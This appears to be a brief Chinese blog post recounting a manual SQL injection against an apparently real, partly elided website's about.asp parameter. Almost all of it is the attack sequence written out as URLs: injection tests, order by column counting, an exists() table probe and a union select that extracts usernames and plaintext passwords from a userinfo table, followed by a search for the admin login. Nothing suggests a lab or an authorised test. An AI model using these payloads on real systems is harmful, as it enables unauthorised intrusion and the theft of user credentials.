...gong.com/about.asp?dd=613‘ //出错
再来
...gong.com/about.asp?dd=613 and 1=1 //正常
...gong.com/about.asp?dd=613 and 1=2//出错
一个注入点
...gong.com/about.asp?dd=613 order by 1 //正常
...gong.com/about.asp?dd=613 order by 19 //正常
...gong.com/about.asp?dd=613 order by 20 //出错
来猜表名(遗憾的是没猜出来,用工具跑出来了)
...gong.com/about.asp?dd=613 and exists(select * from userinfo)//正常,说明存在这个表
再来猜字段
..gong.com/about.asp?dd=613 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from userinfo //页面出来两个数字 13和17
再把13和17用猜的字段代替
..gong.com/about.asp?dd=613 union select 1,2,3,4,5,6,7,8,9,10,11,12,username,14,15,16,password,18,19 from userinfo
用户名和密码爆出来了,密码7位,没有md5加密
找出后台登录就行
猜了几个后台地址都不对,拿工具跑吧
..gong.com/conn.asp //200
打开一看页面空白,应该被人弄过了,这次无聊加以复习心态的一次手工注入就到这结束
时间: 2024-11-08 22:02:44